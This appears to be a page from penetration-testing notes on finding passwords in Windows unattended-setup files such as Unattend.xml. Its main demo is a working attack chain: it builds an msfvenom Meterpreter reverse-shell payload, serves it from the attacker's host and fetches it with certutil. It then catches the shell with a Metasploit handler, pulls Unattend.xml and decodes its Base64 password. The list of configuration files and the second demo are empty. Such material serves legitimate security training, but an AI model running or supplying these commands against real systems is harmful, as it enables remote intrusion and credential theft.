search

Password Search in Windows Configuration Files

hashtag
Windows Configuration File

Windows uses configuration files to store important settings for system setup and user accounts. These files help automate installations and system configurations without manual input.

hashtag
Unattended Windows Setup Utility

The Unattended Windows Setup Utility allows Windows to be installed automatically without user interaction. It uses configuration files to apply pre-set settings, including user accounts and system preferences.

The main configuration files used for this are:

As a security measure, any stored passwords in these files may be encoded in Base64 to obscure them, though they can still be decoded if accessed by an attacker.

hashtag
Demo #1

# Generate a malicious payload using msfvenom that creates a reverse TCP Meterpreter shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[MY IP] LPORT=[MY [PORT] -f exe > payload.exe

# Start a simple HTTP server on port 80 to serve the payload
python -m SimpleHTTPServer 80

# Download the payload
certutil -urlcache -f http://[MY IP]/payload.exe payload.exe

# Use Metasploit's multi/handler to listen for a reverse connection from the payload
msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LPORT
set LHOST
exploit

# Search for the Unattend.xml file, typically used for automated Windows installation settings
search -f Unattend.xml
download Unattend.xml
cat Unattend.xml

# Save extracted password to a text file
echo "Copied Password" > passfile.txt

# Decode the base64-encoded password stored in passfile.txt
base64 -d passfile.txt

hashtag
Demo #2

PreviousCredential DumpingNextMimikatz

Last updated